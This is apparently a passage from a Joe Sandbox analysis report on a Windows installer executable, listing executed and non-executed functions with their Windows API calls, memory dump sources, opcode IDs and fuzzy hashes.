                                                                                                        • Associated: 00000000.00000002.1512643537.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Cpfkf79Rzk.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: PathSearch
                                                                                                        • String ID:
                                                                                                        • API String ID: 2203818243-0
                                                                                                        • Opcode ID: e786f414240c977d8527d6485e0b16ac48e4592c975100b70ba3c002947ce116
                                                                                                        • Instruction ID: 264fbd039af9554c7d5279b05a8ebe462d94e5569cecf838bb527c95a897585a
                                                                                                        • Opcode Fuzzy Hash: e786f414240c977d8527d6485e0b16ac48e4592c975100b70ba3c002947ce116
                                                                                                        • Instruction Fuzzy Hash: FEE0DF72700100EBE710DFA4DE48EAB33A8DF40368B30823AF611B60D1E6B499419B3D
                                                                                                        Function 00405E2C Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,00000000,?,004032DC,000000FF,0040CEA0,00000000,0040CEA0,00000000,?,00000004,00000000), ref: 00405E40
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1512408237.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1512384001.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512430839.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512643537.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Cpfkf79Rzk.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: FileWrite
                                                                                                        • String ID:
                                                                                                        • API String ID: 3934441357-0
                                                                                                        • Opcode ID: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
                                                                                                        • Instruction ID: 5c61021ef0a451a09cd551de8c9c857919e5c63ef2f102696365ec0a5e508dbb
                                                                                                        • Opcode Fuzzy Hash: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
                                                                                                        • Instruction Fuzzy Hash: A0E08C3220021AABCF10AF54DC00BEB3B6CFB007A0F004432F955E7080D230EA248BE8
                                                                                                        Function 00405DFD Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,?,?,0040330E,00000000,00000000,00403165,?,00000004,00000000,00000000,00000000), ref: 00405E11
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1512408237.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1512384001.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512430839.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512643537.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Cpfkf79Rzk.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: FileRead
                                                                                                        • String ID:
                                                                                                        • API String ID: 2738559852-0
                                                                                                        • Opcode ID: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
                                                                                                        • Instruction ID: 9b1550485fdad5d6ef3d10e0c43d96089a261685836c6268fec650e6d6f6a4c0
                                                                                                        • Opcode Fuzzy Hash: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
                                                                                                        • Instruction Fuzzy Hash: D9E08C3220025AABCF109F50EC00EEB3BACEB04360F000433F960E6040D230E9219BE4
                                                                                                        Function 0040234E Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetPrivateProfileStringW.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 0040237F
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1512408237.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1512384001.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512430839.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512643537.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Cpfkf79Rzk.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: PrivateProfileString
                                                                                                        • String ID:
                                                                                                        • API String ID: 1096422788-0
                                                                                                        • Opcode ID: 3f3571743ae8bb518db273e1d5473214efdc558287c9048febf32fba17a38326
                                                                                                        • Instruction ID: 3d6fae6e588f42459dd5c721a8c471f59e455a0f8de0d1d47597fcd0a09f6ae9
                                                                                                        • Opcode Fuzzy Hash: 3f3571743ae8bb518db273e1d5473214efdc558287c9048febf32fba17a38326
                                                                                                        • Instruction Fuzzy Hash: 68E04830804208AADF106FA1CE499AE3A64AF00341F144439F9957B0D1E6F8C4816745
                                                                                                        Function 004060F1 Relevance: 1.5, APIs: 1, Instructions: 19registryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,?,?,?,?,?,0040617F,?,00000000,?,?,: Completed,?), ref: 00406115
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1512408237.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1512384001.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512430839.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512643537.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Cpfkf79Rzk.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Open
                                                                                                        • String ID:
                                                                                                        • API String ID: 71445658-0
                                                                                                        • Opcode ID: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
                                                                                                        • Instruction ID: 20b5f733041f2f32f375600c7003e80ff03328fe780dbad1ce8753698e77b2b9
                                                                                                        • Opcode Fuzzy Hash: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
                                                                                                        • Instruction Fuzzy Hash: 9BD0123204020DBBDF119E909D01FAB376DAB08310F014826FE06A8092D776D530AB54
                                                                                                        Function 004015A3 Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015AE
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1512408237.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1512384001.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512430839.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512643537.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Cpfkf79Rzk.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: AttributesFile
                                                                                                        • String ID:
                                                                                                        • API String ID: 3188754299-0
                                                                                                        • Opcode ID: 5f2b9645a280aa2e5618dda491c9c816a8b757916b71e5b574aff38626a5ba8c
                                                                                                        • Instruction ID: b9fbdb96d3617381fc4168e6aeef7157df6c2fc4641ee643fe61426fbe6ebd08
                                                                                                        • Opcode Fuzzy Hash: 5f2b9645a280aa2e5618dda491c9c816a8b757916b71e5b574aff38626a5ba8c
                                                                                                        • Instruction Fuzzy Hash: 69D01232B04100DBDB10DBA4AF4899E73A49B44369B304677E502F11D0D6B9D9515A29
                                                                                                        Function 00404247 Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404259
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1512408237.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1512384001.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512430839.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512643537.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Cpfkf79Rzk.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: MessageSend
                                                                                                        • String ID:
                                                                                                        • API String ID: 3850602802-0
                                                                                                        • Opcode ID: 01c1f4f33aac3a691bde0469ce369b5b71776cf29dade69a37d66e4d0fb82d37
                                                                                                        • Instruction ID: 7bbc1d354ca6a657268cc6ac0e987aef7d9b1e86ba1bc1dada8f70c4162f718e
                                                                                                        • Opcode Fuzzy Hash: 01c1f4f33aac3a691bde0469ce369b5b71776cf29dade69a37d66e4d0fb82d37
                                                                                                        • Instruction Fuzzy Hash: B6C04C717402016AEA209B519E49F1677545BA0B40F1584797750E50E4C674D450D62C
                                                                                                        Function 00403311 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • SetFilePointer.KERNELBASE(?,00000000,00000000,004030A4,?,?,00000006,00000008,0000000A), ref: 0040331F
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1512408237.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1512384001.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512430839.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512643537.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Cpfkf79Rzk.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: FilePointer
                                                                                                        • String ID:
                                                                                                        • API String ID: 973152223-0
                                                                                                        • Opcode ID: d5a77a7b91dde00220c09aa0a832f43c90240fc94845358d4caa889c1b96a79f
                                                                                                        • Instruction ID: c7266a3154837caca095f11e7777f6dda2278cbf6cff4ee7664d3894fc3aa091
                                                                                                        • Opcode Fuzzy Hash: d5a77a7b91dde00220c09aa0a832f43c90240fc94845358d4caa889c1b96a79f
                                                                                                        • Instruction Fuzzy Hash: ECB01271240300BFDA214F00DF09F057B21AB90700F10C034B348380F086711035EB0D
                                                                                                        Function 00404230 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • SendMessageW.USER32(00000028,?,00000001,0040405B), ref: 0040423E
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1512408237.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1512384001.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512430839.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512643537.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Cpfkf79Rzk.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: MessageSend
                                                                                                        • String ID:
                                                                                                        • API String ID: 3850602802-0
                                                                                                        • Opcode ID: 5ca98cf1e0c0583582b159413f58df588980414c8ed315818e52b16ce3e78aaf
                                                                                                        • Instruction ID: b613885e7b2bd37cd291f1056477dd360c9db9b8968a6fc02a79c1078c08bd5c
                                                                                                        • Opcode Fuzzy Hash: 5ca98cf1e0c0583582b159413f58df588980414c8ed315818e52b16ce3e78aaf
                                                                                                        • Instruction Fuzzy Hash: 51B09235280600ABDE214B40DE49F467A62A7B4701F008178B240640B0CAB200A1DB19
                                                                                                        Function 004058B0 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • ShellExecuteExW.SHELL32(?), ref: 004058BF
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1512408237.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1512384001.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512430839.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512643537.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Cpfkf79Rzk.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ExecuteShell
                                                                                                        • String ID:
                                                                                                        • API String ID: 587946157-0
                                                                                                        • Opcode ID: 635164c3b06ed96bf07ad63cc2cf624e21a1ddaff933affe27173adac056c9f0
                                                                                                        • Instruction ID: 322818d701d9cc3fc85427ca8463de8bac6637280c84b784c1803e53dd53602d
                                                                                                        • Opcode Fuzzy Hash: 635164c3b06ed96bf07ad63cc2cf624e21a1ddaff933affe27173adac056c9f0
                                                                                                        • Instruction Fuzzy Hash: 55C092B2000200DFE301CF90CB08F067BF8AF59306F028058E1849A160C7788800CB69
                                                                                                        Function 0040421D Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • KiUserCallbackDispatcher.NTDLL(?,00403FF4), ref: 00404227
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1512408237.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1512384001.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512430839.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512643537.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Cpfkf79Rzk.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CallbackDispatcherUser
                                                                                                        • String ID:
                                                                                                        • API String ID: 2492992576-0
                                                                                                        • Opcode ID: 01955649d6a23d6122fd97f0d30e7ef4bb95205b783011211b5c169bc8d67104
                                                                                                        • Instruction ID: cd7a90ca9096364f54c072f0977fd0b21683179c1f8a6313e809ce6865a57a73
                                                                                                        • Opcode Fuzzy Hash: 01955649d6a23d6122fd97f0d30e7ef4bb95205b783011211b5c169bc8d67104
                                                                                                        • Instruction Fuzzy Hash: AFA01231100400ABCE124F50DF08C09BA31B7B43017104439A1400003086320420EB08
                                                                                                        Function 00401F06 Relevance: 1.3, APIs: 1, Instructions: 37COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 004052EC: lstrlenW.KERNEL32(Completed,00000000,00410EA0,004030B0,?,?,?,?,?,?,?,?,?,0040324F,00000000,?), ref: 00405324
                                                                                                          • Part of subcall function 004052EC: lstrlenW.KERNEL32(0040324F,Completed,00000000,00410EA0,004030B0,?,?,?,?,?,?,?,?,?,0040324F,00000000), ref: 00405334
                                                                                                          • Part of subcall function 004052EC: lstrcatW.KERNEL32(Completed,0040324F,0040324F,Completed,00000000,00410EA0,004030B0), ref: 00405347
                                                                                                          • Part of subcall function 004052EC: SetWindowTextW.USER32(Completed,Completed), ref: 00405359
                                                                                                          • Part of subcall function 004052EC: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040537F
                                                                                                          • Part of subcall function 004052EC: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405399
                                                                                                          • Part of subcall function 004052EC: SendMessageW.USER32(?,00001013,?,00000000), ref: 004053A7
                                                                                                          • Part of subcall function 0040586D: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,004266F0,Error launching installer), ref: 00405896
                                                                                                          • Part of subcall function 0040586D: CloseHandle.KERNEL32(?), ref: 004058A3
                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00401F4D
                                                                                                          • Part of subcall function 0040670F: WaitForSingleObject.KERNEL32(?,00000064), ref: 00406720
                                                                                                          • Part of subcall function 0040670F: GetExitCodeProcess.KERNEL32(?,?), ref: 00406742
                                                                                                          • Part of subcall function 004061CB: wsprintfW.USER32 ref: 004061D8
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1512408237.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1512384001.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512430839.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512643537.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Cpfkf79Rzk.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
                                                                                                        • String ID:
                                                                                                        • API String ID: 2972824698-0
                                                                                                        • Opcode ID: 4bccf259bf579bfc981a9d644e2eeac5cb2ef6dcf81bcc0c58dbcf99a973db51
                                                                                                        • Instruction ID: 3becab0f16e6f8309876834f620f7dc234fcc10e550b4e4e61bdbb7a81e04ee7
                                                                                                        • Opcode Fuzzy Hash: 4bccf259bf579bfc981a9d644e2eeac5cb2ef6dcf81bcc0c58dbcf99a973db51
                                                                                                        • Instruction Fuzzy Hash: 3EF09632905011DBCB20FBA1894459F76A49F00318B2445BBF902B21D1C77D0E519A6E

                                                                                                        Non-executed Functions

                                                                                                        Function 00404C68 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 481windowmemoryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetDlgItem.USER32(?,000003F9), ref: 00404C80
                                                                                                        • GetDlgItem.USER32(?,00000408), ref: 00404C8B
                                                                                                        • GlobalAlloc.KERNEL32(00000040,?), ref: 00404CD5
                                                                                                        • LoadBitmapW.USER32(0000006E), ref: 00404CE8
                                                                                                        • SetWindowLongW.USER32(?,000000FC,00405260), ref: 00404D01
                                                                                                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404D15
                                                                                                        • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404D27
                                                                                                        • SendMessageW.USER32(?,00001109,00000002), ref: 00404D3D
                                                                                                        • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404D49
                                                                                                        • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404D5B
                                                                                                        • DeleteObject.GDI32(00000000), ref: 00404D5E
                                                                                                        • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404D89
                                                                                                        • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404D95
                                                                                                        • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404E2B
                                                                                                        • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404E56
                                                                                                        • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404E6A
                                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00404E99
